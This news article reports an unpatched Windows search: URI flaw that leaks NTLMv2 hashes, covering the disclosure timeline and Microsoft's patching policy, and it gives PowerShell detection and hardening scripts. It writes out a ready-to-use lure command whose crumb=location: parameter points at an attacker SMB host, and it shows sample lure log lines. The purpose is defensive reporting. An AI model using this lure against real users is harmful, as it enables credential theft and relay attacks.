Unpatched Windows Search URI Handler Vulnerability Exposes NTLMv2 Hashes, Raising Concerns Over Microsoft’s Patching Policy

Cahyo Dewo, June 3, 2026

Cybersecurity researchers have unveiled details of an unpatched vulnerability within the Windows operating system that could be exploited to disclose a user’s NTLMv2 hash to an attacker. This newly identified flaw, residing in the search: Uniform Resource Identifier (URI) handler, bears striking similarities to a previously patched vulnerability (CVE-2026-33829) affecting the Windows Snipping Tool’s ms-screensketch: URI handler. The discovery, attributed to researchers at Huntress, has ignited discussions within the cybersecurity community, particularly in light of Microsoft’s decision to decline a patch for the issue, citing its "Moderate" severity rating.

Understanding the New Vulnerability: The search: URI Handler Flaw

The core of the vulnerability lies in how Windows handles specific URI schemes, which are essentially protocols that allow applications to interact with the operating system and other programs. In this instance, the search: URI handler, designed to initiate search queries within Windows, can be manipulated to trigger an unintended NTLM authentication process. Specifically, the flaw leverages the crumb=location: parameter within the search: URI.

An attacker could craft a malicious link, embedding it within a seemingly innocuous web page, an email message, or another URL source. Should an unsuspecting user click this specially crafted link, the operating system would be compelled to connect to an attacker-controlled Server Message Block (SMB) server. This connection, initiated by the crumb=location: parameter pointing to a remote Universal Naming Convention (UNC) path, would trigger an NTLM authentication attempt. During this authentication handshake, the victim’s Net-NTLMv2 hash would be inadvertently disclosed to the attacker.

The command syntax demonstrating this exploitation is remarkably straightforward:
start "" "search:query=test&crumb=location:\\10.0.1.100\share"

In this example, 10.0.1.100 represents the attacker-controlled SMB server, and share is a designated network share. When executed, this command prompts the victim’s system to attempt to authenticate with the specified SMB server, thereby leaking the NTLMv2 hash. The simplicity of this vector underscores its potential danger, as it requires minimal user interaction beyond clicking a link.
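As an added example (not code from the article or from Huntress), the following PowerShell scans exported proxy, mail-gateway or endpoint log lines for search: URIs whose crumb=location: value resolves to a UNC path, which is the condition that triggers the outbound SMB connection described above. The log format (a url= field) and the three log lines are constructed for the example; the function name is an assumption.

```powershell
# Constructed sample log lines: one plain lure, one benign search, one percent-encoded lure.
$sampleLines = @(
    '2026-06-03T10:01:12Z user=alice url=search:query=test&crumb=location:\\10.0.1.100\share',
    '2026-06-03T10:02:40Z user=bob   url=search:query=quarterly%20report',
    '2026-06-03T10:03:05Z user=carol url=search:query=x&crumb=location:%5C%5Cfiles.example.net%5Cpub'
)

function Find-SearchUriUncLure {
    param([string[]]$Lines)
    # Match a search: URI and capture the crumb=location: value up to the next '&', quote or whitespace.
    $pattern = 'search:[^\s"]*?crumb=location:(?<loc>[^&\s"]+)'
    foreach ($line in $Lines) {
        $m = [regex]::Match($line, $pattern, 'IgnoreCase')
        if (-not $m.Success) { continue }
        # Percent-decode so a UNC prefix hidden as %5C%5C is still recognised.
        $loc = [uri]::UnescapeDataString($m.Groups['loc'].Value)
        # Only a \\host\share location causes the SMB/NTLM round trip; local paths do not.
        if ($loc -match '^\\\\(?<host>[^\\]+)\\') {
            [pscustomobject]@{
                Line       = $line
                RemoteHost = $Matches['host']
                Location   = $loc
            }
        }
    }
}

# Emits the two lure lines with their remote hosts (10.0.1.100 and files.example.net).
Find-SearchUriUncLure -Lines $sampleLines | Format-Table -AutoSize
```

The RemoteHost column is the value to compare against known-internal file servers; anything external is worth an alert.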

A Familiar Threat: The Precedent of CVE-2026-33829

The current search: URI handler vulnerability is not an isolated incident but rather a recurrence of a known pattern. Just months prior, in April 2026, Microsoft addressed CVE-2026-33829, a spoofing vulnerability that impacted the Windows Snipping Tool. This earlier flaw stemmed from the Snipping Tool’s ms-screensketch: URI handler, which accepted an unvalidated filePath parameter. Similar to the current discovery, the Snipping Tool’s handler would reach out to any UNC path provided to it, leading to the same NTLM authentication and subsequent Net-NTLMv2 hash disclosure.

Microsoft’s advisory for CVE-2026-33829 explicitly detailed the attack vector: "An attacker could induce the user into clicking a specially crafted link in a Web browser or other URL source, by embedding it in a Web page or email message. If the user approves the launching of the link, the crafted URL can induce the computer to connect to an SMB server of the attacker’s choosing, which would disclose the user’s NTLMv2 hash to the attacker, who could use this to authenticate as the user."

Huntress researcher Andrew Schwartz highlighted the striking similarities: "It used the same NTLM leakage mechanism, produced the same Net-NTLMv2 leak, had the same prerequisites, and carried the same Moderate rating." This parallel raises significant questions about why a vulnerability employing an identical leakage mechanism and having the same severity rating would warrant a patch in one instance but not the other. The historical context further solidifies this pattern, as the use of a "crumb" parameter to steal NTLM hashes (CVE-2023-35636) was previously documented by Varonis in February 2024, specifically in relation to Outlook vulnerabilities. This demonstrates a persistent pattern of NTLM hash leakage through URI handler manipulation.

The Criticality of NTLMv2 Hashes and Relay Attacks

To fully appreciate the implications of this vulnerability, it is essential to understand what NTLMv2 hashes are and how they can be weaponized by threat actors. NTLM (NT LAN Manager) is a suite of Microsoft security protocols that provide authentication, integrity, and confidentiality to users. While largely superseded by Kerberos in modern Windows domains, NTLM remains widely used in various scenarios, particularly in legacy systems, workgroup environments, and for backward compatibility.

An NTLMv2 hash is a cryptographic representation of a user’s password. Unlike storing the actual password in plain text, systems store hashes, which are one-way functions designed to be difficult to reverse engineer. However, these hashes are still incredibly sensitive. An attacker who captures an NTLMv2 hash can leverage it in two primary ways:

  1. Offline Cracking: While computationally intensive, sophisticated attackers can attempt to "crack" the hash offline using brute-force attacks, dictionary attacks, or rainbow tables. If successful, they recover the user’s original password, granting them full access.
  2. NTLM Relay Attacks: This is often the more immediate and potent threat. In an NTLM relay attack, the captured hash is not cracked but rather "relayed" directly to another service or machine on the network that accepts NTLM authentication. The attacker acts as a man-in-the-middle, intercepting the authentication attempt and replaying it to a target server. This allows the attacker to authenticate as the victim without ever knowing the actual password, facilitating lateral movement within a network, accessing sensitive resources, and escalating privileges. These attacks are particularly effective in environments where SMB signing is not enforced.

The long history of NTLM vulnerabilities underscores its persistent appeal to attackers. Despite Microsoft’s efforts to transition towards more secure authentication mechanisms like Kerberos, the prevalence of NTLM in older systems and certain configurations means that any new method of extracting NTLM hashes represents a significant security concern for organizations globally.

Chronology of Discovery, Disclosure, and Denial

The timeline of this vulnerability highlights the process of responsible disclosure and the subsequent divergence in opinion between security researchers and a major vendor.

  • April 15, 2026: Huntress researchers, following their discovery of the search: URI handler flaw, responsibly disclosed the details to Microsoft. This adheres to standard industry practice, allowing vendors a window to develop and release patches before public disclosure.
  • Following Disclosure: Microsoft conducted its internal assessment of the reported vulnerability. This process typically involves validating the flaw, assessing its severity, and determining the scope of affected products.
  • Microsoft’s Decision: After its review, Microsoft declined to address the issue. Their official stance was that "only Important and Critical severity cases meet our bar for servicing." This categorization placed the search: URI handler vulnerability, much like its Snipping Tool predecessor, into the "Moderate" severity tier, which Microsoft deemed insufficient for immediate patching.
  • June 03, 2026: Given Microsoft’s decision not to issue a fix, Huntress proceeded with public disclosure of the unpatched vulnerability. This move is often undertaken by security researchers to inform the wider community of active threats and encourage users and administrators to implement their own mitigations, especially when a vendor patch is unavailable.

This chronology underscores the tension that can arise between security researchers, who often prioritize the immediate mitigation of any exploitable flaw, and large software vendors, who must balance the severity of a vulnerability against the resources required for patching and the potential for disruption caused by updates.

The Implications of Microsoft’s Patching Policy

Microsoft’s decision to classify the search: URI handler vulnerability as "Moderate" and subsequently decline to patch it has significant implications for enterprise security and raises broader questions about vulnerability management. Microsoft’s severity ratings (Critical, Important, Moderate, Low) are designed to guide organizations on the urgency of applying security updates.

A "Moderate" rating, while not as alarming as "Critical" or "Important," still indicates a vulnerability that could be exploited to compromise a system or disclose sensitive information. The specific justification – that "only Important and Critical severity cases meet our bar for servicing" – suggests a threshold-based approach to patching. This policy, while understandable from a resource allocation perspective for a company managing a vast ecosystem of products, can be problematic for security professionals.

For an NTLMv2 hash disclosure vulnerability, even one requiring user interaction, the practical risk can be substantial. Social engineering techniques, such as phishing emails or malicious websites, are highly effective at inducing users to click links. Once an NTLMv2 hash is captured, the subsequent NTLM relay attacks can lead to full domain compromise if not properly mitigated. In the context of the current threat landscape, where ransomware and sophisticated nation-state attacks frequently leverage lateral movement and credential theft, a "Moderate" rating for a hash disclosure flaw might be perceived as understating the real-world danger by many security experts.

The differing response to the ms-screensketch: (patched) and search: (unpatched) vulnerabilities, despite their technical similarities and identical severity ratings, further complicates the understanding of Microsoft’s patching rationale. This inconsistency can create confusion for IT administrators trying to prioritize their defenses. It effectively shifts the burden of protection from the vendor to the end-user organizations, requiring them to implement proactive mitigation strategies in the absence of an official fix.

Mitigation Strategies and Proactive Defense

In the absence of a direct patch from Microsoft, organizations are advised to implement several critical mitigation strategies to protect against NTLMv2 hash disclosure and NTLM relay attacks. These measures are robust defenses against not only this specific vulnerability but also a broader range of NTLM-based threats.

  1. Block Outbound SMB (TCP/445 and TCP/139): This is arguably the most effective and fundamental mitigation. By blocking outbound Server Message Block (SMB) traffic on Transmission Control Protocol (TCP) ports 445 and 139, organizations can prevent endpoints from connecting to arbitrary external SMB servers. This directly thwarts the attack vector, as the crafted URI handler relies on establishing an SMB connection to an attacker-controlled server to exfiltrate the hash. It is crucial to implement this at the network perimeter (firewalls) and, where feasible, on individual host firewalls for endpoints that do not legitimately require outbound SMB connectivity.
  2. Enforce SMB Signing: SMB signing is a security feature that adds a digital signature to each SMB packet. This signature ensures the integrity of the data and authenticates the sender, making NTLM relay attacks significantly more difficult. If SMB signing is enforced on target servers, an attacker’s relayed hash, even if captured, cannot be used to authenticate because the relayed session would lack the proper signature. Organizations should enforce SMB signing on all critical servers, especially Domain Controllers, to prevent an attacker from using captured hashes for lateral movement.
  3. Disable NTLM Where Applicable: For environments that have fully transitioned to Kerberos or other modern authentication protocols, disabling NTLM entirely is the most secure long-term solution. This can be complex in large, heterogeneous environments with legacy applications or devices that still rely on NTLM. However, for specific systems or segments of the network where NTLM is not a strict requirement, disabling it eliminates the attack surface for NTLM hash theft.
  4. User Education and Awareness: While technical controls are paramount, educating users about the dangers of clicking suspicious links in emails or on untrusted websites remains a vital layer of defense. Phishing awareness training can help reduce the likelihood of the initial exploitation.
  5. Endpoint Detection and Response (EDR) Solutions: Deploying robust EDR solutions can help detect and alert on suspicious outbound SMB connections, unusual NTLM authentication attempts, or other indicators of compromise that might arise from an attempted exploitation of this or similar vulnerabilities.
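The host-level parts of mitigations 1 to 3 above, as an added PowerShell example (not the article’s or Microsoft’s own script). It must run as Administrator on the endpoint. The firewall rule names are assumptions, and the Internet address keyword is one scoping choice: it keeps local subnets reachable, but organizations that enumerate their internal ranges explicitly should substitute those instead.

```powershell
# 1. Block outbound SMB (TCP 445 and 139) to Internet addresses on the host firewall.
foreach ($port in 445, 139) {
    $name = "Block outbound SMB TCP/$port to Internet"   # assumed rule name
    if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $name -Direction Outbound -Protocol TCP `
            -RemotePort $port -RemoteAddress Internet -Action Block -Profile Any | Out-Null
    }
}

# 2. Require SMB signing for both the client and the server role on this host,
#    so a relayed session without a valid signature is rejected.
Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force

# 3. Audit the "Restrict NTLM: Outgoing NTLM traffic to remote servers" setting.
#    Values: 0 = allow all, 1 = audit, 2 = deny all (raise to 2 only where NTLM is not needed).
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
$restrict = (Get-ItemProperty -Path $lsa -Name RestrictSendingNTLMTraffic `
    -ErrorAction SilentlyContinue).RestrictSendingNTLMTraffic
if ($null -eq $restrict) { $restrict = 0 }   # absent value means the default: allow all

# Summary of the resulting posture for this endpoint.
[pscustomobject]@{
    OutboundSmb445Blocked = [bool](Get-NetFirewallRule -DisplayName 'Block outbound SMB TCP/445 to Internet' -ErrorAction SilentlyContinue)
    OutboundSmb139Blocked = [bool](Get-NetFirewallRule -DisplayName 'Block outbound SMB TCP/139 to Internet' -ErrorAction SilentlyContinue)
    ClientSigningRequired = (Get-SmbClientConfiguration).RequireSecuritySignature
    ServerSigningRequired = (Get-SmbServerConfiguration).RequireSecuritySignature
    RestrictOutgoingNtlm  = $restrict
}
```

Apply the same three controls centrally through Group Policy for fleet-wide coverage; the script is useful for spot checks and for hosts outside the domain.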

Broader Cybersecurity Context and Outlook

The disclosure of this unpatched search: URI handler vulnerability serves as a stark reminder of the persistent challenges posed by legacy protocols and the intricate nature of modern operating systems. Despite continuous advancements in security, attackers consistently find new ways to exploit older functionalities or subtle implementation flaws. NTLM, being a foundational but aging authentication protocol, remains a prime target due to its widespread presence and the high value of its hashes.

The role of responsible disclosure by cybersecurity research firms like Huntress is critical in this evolving landscape. By identifying and reporting these vulnerabilities, even when vendors decline to patch, they empower the broader security community to understand potential risks and implement their own protective measures.

Ultimately, this incident underscores the necessity for organizations to adopt a comprehensive, defense-in-depth security strategy. Relying solely on vendor patches is insufficient; proactive network segmentation, robust authentication policies, continuous monitoring, and employee education are indispensable components of a resilient cybersecurity posture in an environment where not every discovered flaw will receive an official fix. The ongoing battle against NTLM-related vulnerabilities is a testament to the fact that foundational security hygiene remains paramount in safeguarding digital assets against an ever-adapting adversary.
